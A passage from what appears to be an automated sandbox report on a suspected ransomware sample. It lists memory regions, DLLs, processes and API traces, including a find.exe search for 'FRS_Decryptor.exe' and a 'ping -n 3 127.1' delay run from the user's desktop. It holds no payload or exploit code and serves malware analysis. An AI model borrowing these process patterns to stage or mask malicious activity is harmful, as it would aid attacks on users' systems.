mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 4830 start_va = 0x73f70000 end_va = 0x73f87fff entry_point = 0x73f70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 4831 start_va = 0x7f3ad000 end_va = 0x7f3affff entry_point = 0x0 region_type = private name = "private_0x000000007f3ad000" filename = "" Region: id = 4832 start_va = 0x7f4d7000 end_va = 0x7f4d9fff entry_point = 0x0 region_type = private name = "private_0x000000007f4d7000" filename = "" Region: id = 4833 start_va = 0x7f4da000 end_va = 0x7f4dcfff entry_point = 0x0 region_type = private name = "private_0x000000007f4da000" filename = "" Region: id = 4834 start_va = 0x73360000 end_va = 0x7340afff entry_point = 0x73360000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Thread: id = 263 os_tid = 0xad8 Thread: id = 265 os_tid = 0x954 Thread: id = 266 os_tid = 0xb38 Thread: id = 267 os_tid = 0x8a0 Process: id = "92" image_name = "find.exe" filename = "c:\\windows\\syswow64\\find.exe" page_root = "0x11a34000" os_pid = "0xae8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "90" os_parent_pid = "0xa98" cmd_line = "find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4731 start_va = 0x120000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 4732 start_va = 0x140000 end_va = 0x141fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 4733 start_va = 0x150000 end_va = 0x15efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 4734 start_va = 0x160000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 4735 start_va = 0x1a0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 4736 start_va = 0x1e0000 end_va = 0x1e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 4737 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 4738 start_va = 0x200000 end_va = 0x201fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4739 start_va = 0x11c0000 end_va = 0x11c6fff entry_point = 0x11c0000 region_type = mapped_file name = "find.exe" filename = "\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe") Region: id = 4740 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4741 start_va = 0x7f9e0000 end_va = 0x7fa02fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f9e0000" filename = "" Region: id = 4742 start_va = 0x7fa0b000 end_va = 0x7fa0dfff entry_point = 0x0 region_type = private name = "private_0x000000007fa0b000" filename = "" Region: id = 4743 start_va = 0x7fa0e000 end_va = 0x7fa0efff entry_point = 0x0 region_type = private name = "private_0x000000007fa0e000" filename = "" Region: id = 4744 start_va = 0x7fa0f000 end_va = 0x7fa0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fa0f000" filename = "" Region: id = 4745 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4746 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4747 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4748 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 4753 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 4754 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4755 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4756 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4757 start_va = 0x120000 end_va = 0x12ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 4758 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 4759 start_va = 0x140000 end_va = 0x143fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 4760 start_va = 0x210000 end_va = 0x28dfff entry_point = 0x210000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4761 start_va = 0x580000 end_va = 0x67ffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 4762 start_va = 0x820000 end_va = 0x82ffff entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 4763 start_va = 0x734f0000 end_va = 0x734fefff entry_point = 0x734f0000 region_type = mapped_file name = "fsutilext.dll" filename = "\\Windows\\SysWOW64\\fsutilext.dll" (normalized: "c:\\windows\\syswow64\\fsutilext.dll") Region: id = 4764 start_va = 0x73500000 end_va = 0x73520fff entry_point = 0x73500000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\SysWOW64\\ulib.dll" (normalized: "c:\\windows\\syswow64\\ulib.dll") Region: id = 4765 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4766 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4767 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4768 start_va = 0x7f8e0000 end_va = 0x7f9dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f8e0000" filename = "" Thread: id = 264 os_tid = 0xb20 Process: id = "93" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0x76030000" os_pid = "0xaa8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "ping -n 3 127.1" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4835 start_va = 0x780000 end_va = 0x79ffff entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 4836 start_va = 0x7a0000 end_va = 0x7a1fff entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 4837 start_va = 0x7b0000 end_va = 0x7befff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 4838 start_va = 0x7c0000 end_va = 0x7fffff entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 4839 start_va = 0x800000 end_va = 0x83ffff entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 4840 start_va = 0x840000 end_va = 0x843fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 4841 start_va = 0x850000 end_va = 0x850fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 4842 start_va = 0x860000 end_va = 0x861fff entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 4843 start_va = 0x940000 end_va = 0x948fff entry_point = 0x940000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe") Region: id = 4844 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4845 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 4846 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 4847 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 4848 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 4849 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4850 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4851 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4852 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 4853 start_va = 0xb40000 end_va = 0xb4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 4854 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4855 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4856 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4857 start_va = 0x780000 end_va = 0x78ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 4858 start_va = 0x790000 end_va = 0x793fff entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 4859 start_va = 0x870000 end_va = 0x8edfff entry_point = 0x870000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4860 start_va = 0xac0000 end_va = 0xacffff entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 4861 start_va = 0xd10000 end_va = 0xe0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d10000" filename = "" Region: id = 4862 start_va = 0x73db0000 end_va = 0x73db7fff entry_point = 0x73db0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 4863 start_va = 0x73dc0000 end_va = 0x73dddfff entry_point = 0x73dc0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 4864 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4865 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4866 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4867 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4868 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 4869 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4870 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4871 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4872 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 4873 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4874 start_va = 0x7eeb0000 end_va = 0x7efaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eeb0000" filename = "" Region: id = 4875 start_va = 0x8f0000 end_va = 0x92ffff entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 4876 start_va = 0x950000 end_va = 0x98ffff entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 4877 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 4878 start_va = 0x73690000 end_va = 0x736d4fff entry_point = 0x73690000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 4879 start_va = 0x7a0000 end_va = 0x7a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 4880 start_va = 0x930000 end_va = 0x930fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 4881 start_va = 0x990000 end_va = 0x992fff entry_point = 0x990000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui") Region: id = 4882 start_va = 0x9a0000 end_va = 0x9dffff entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 4883 start_va = 0x9e0000 end_va = 0xa1ffff entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 4884 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Thread: id = 268 os_tid = 0x4c0 [0099.414] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0099.414] __set_app_type (_Type=0x1) [0099.414] __p__fmode () returned 0x76ea1768 [0099.414] __p__commode () returned 0x76ea176c [0099.414] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x943229) returned 0x0 [0099.414] __wgetmainargs (in: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0, _DoWildCard=0, _StartInfo=0x9440dc | out: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0) returned 0 [0099.414] SetThreadUILanguage (LangId=0x0) returned 0x409 [0099.416] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0099.416] _fileno (_File=0x76ea4c28) returned 1 [0099.416] _get_osfhandle (_FileHandle=1) returned 0x28 [0099.416] GetFileType (hFile=0x28) returned 0x2 [0099.416] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x83f160 | out: lpMode=0x83f160) returned 0 [0099.416] GetLastError () returned 0x6 [0099.416] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x83f0c4, nSize=0x50 | out: lpBuffer="䤐Ñ") returned 0x0 [0099.416] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x945500 | out: lpWSAData=0x945500) returned 0 [0099.418] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x83f17c | out: phkResult=0x83f17c*=0x88) returned 0x0 [0099.418] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x83f170, lpData=0x83f178, lpcbData=0x83f174*=0x4 | out: lpType=0x83f170*=0x0, lpData=0x83f178*=0x0, lpcbData=0x83f174*=0x4) returned 0x2 [0099.418] RegCloseKey (hKey=0x88) returned 0x0 [0099.418] GetAddrInfoW (in: pNodeName="127.1", pServiceName=0x0, pHints=0x83f140*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x83f17c | out: ppResult=0x83f17c*=0xd1c3e0*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xd18ac0*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) returned 0 [0099.418] FreeAddrInfoW (pAddrInfo=0xd1c3e0*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xd18ac0*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) [0099.418] IcmpCreateFile () returned 0xd16b48 [0099.421] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0xd1c2a0 [0099.421] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0xd25270 [0099.421] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x83f278, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0099.422] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0x83f170, nSize=0x0, Arguments=0x83f16c | out: lpBuffer="竈Òפּ\x83┗\x94䰨盪❋") returned 0x14 [0099.423] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0099.423] _fileno (_File=0x76ea4c28) returned 1 [0099.423] _get_osfhandle (_FileHandle=1) returned 0x28 [0099.423] GetFileType (hFile=0x28) returned 0x2 [0099.423] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x83f134 | out: lpMode=0x83f134) returned 0 [0099.423] GetLastError () returned 0x6 [0099.423] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x83f098, nSize=0x50 | out: lpBuffer="\x83❋") returned 0x0 [0099.423] _fileno (_File=0x76ea4c28) returned 1 [0099.423] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0099.423] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0099.423] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0xd27b00 [0099.424] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0xd27b00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPinging 127.0.0.1 ", lpUsedDefaultChar=0x0) returned 21 [0099.424] _fileno (_File=0x76ea4c28) returned 1 [0099.424] _write (in: _FileHandle=1, _Buf=0xd27b00*, _MaxCharCount=0x14 | out: _Buf=0xd27b00*) returned 20 [0099.424] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0099.424] _fileno (_File=0x76ea4c28) returned 1 [0099.424] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0099.424] LocalFree (hMem=0xd27b00) returned 0x0 [0099.424] LocalFree (hMem=0xd27ac8) returned 0x0 [0099.424] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x83f170, nSize=0x0, Arguments=0x83f16c | out: lpBuffer="竈Òפּ\x83▪\x94䰨盪❚") returned 0x18 [0099.424] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0099.424] _fileno (_File=0x76ea4c28) returned 1 [0099.424] _get_osfhandle (_FileHandle=1) returned 0x28 [0099.424] GetFileType (hFile=0x28) returned 0x2 [0099.424] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x83f134 | out: lpMode=0x83f134) returned 0 [0099.424] GetLastError () returned 0x6 [0099.424] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x83f098, nSize=0x50 | out: lpBuffer="\x83❚") returned 0x0 [0099.424] _fileno (_File=0x76ea4c28) returned 1 [0099.424] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0099.424] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0099.424] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0xd1c368 [0099.424] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0xd1c368, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="with 32 bytes of data:\r\n", lpUsedDefaultChar=0x0) returned 25 [0099.424] _fileno (_File=0x76ea4c28) returned 1 [0099.424] _write (in: _FileHandle=1, _Buf=0xd1c368*, _MaxCharCount=0x18 | out: _Buf=0xd1c368*) returned 24 [0099.424] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0099.424] _fileno (_File=0x76ea4c28) returned 1 [0099.424] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0099.424] LocalFree (hMem=0xd1c368) returned 0x0 [0099.424] LocalFree (hMem=0xd27ac8) returned 0x0 [0099.424] SetConsoleCtrlHandler (HandlerRoutine=0x941a3d, Add=1) returned 1 [0099.424] IcmpSendEcho2Ex (in: IcmpHandle=0xd16b48, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xd1c2a0, RequestSize=0x20, RequestOptions=0x83f1ec, ReplyBuffer=0xd25270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xd25270) returned 0x1 [0099.425] InetNtopW (in: Family=2, pAddr=0x83f1dc, pStringBuf=0x83f304, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0099.425] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x83f170, nSize=0x0, Arguments=0x83f16c | out: lpBuffer="笰Òפּ\x83⛔\x94䰨盪✣") returned 0x16 [0099.425] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0099.425] _fileno (_File=0x76ea4c28) returned 1 [0099.425] _get_osfhandle (_FileHandle=1) returned 0x28 [0099.425] GetFileType (hFile=0x28) returned 0x2 [0099.425] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x83f134 | out: lpMode=0x83f134) returned 0 [0099.425] GetLastError () returned 0x6 [0099.425] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x83f098, nSize=0x50 | out: lpBuffer="\x83✣") returned 0x0 [0099.425] _fileno (_File=0x76ea4c28) returned 1 [0099.425] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0099.425] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0099.425] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xd27b68 [0099.425] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xd27b68, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0099.425] _fileno (_File=0x76ea4c28) returned 1 [0099.425] _write (in: _FileHandle=1, _Buf=0xd27b68*, _MaxCharCount=0x16 | out: _Buf=0xd27b68*) returned 22 [0099.426] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0099.426] _fileno (_File=0x76ea4c28) returned 1 [0099.426] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0099.426] LocalFree (hMem=0xd27b68) returned 0x0 [0099.426] LocalFree (hMem=0xd27b30) returned 0x0 [0099.426] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x83f170, nSize=0x0, Arguments=0x83f16c | out: lpBuffer="笰Òפּ\x83⛿\x94䰨盪✼") returned 0x9 [0099.426] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0099.426] _fileno (_File=0x76ea4c28) returned 1 [0099.426] _get_osfhandle (_FileHandle=1) returned 0x28 [0099.426] GetFileType (hFile=0x28) returned 0x2 [0099.426] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x83f134 | out: lpMode=0x83f134) returned 0 [0099.426] GetLastError () returned 0x6 [0099.426] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x83f098, nSize=0x50 | out: lpBuffer="\x83✼") returned 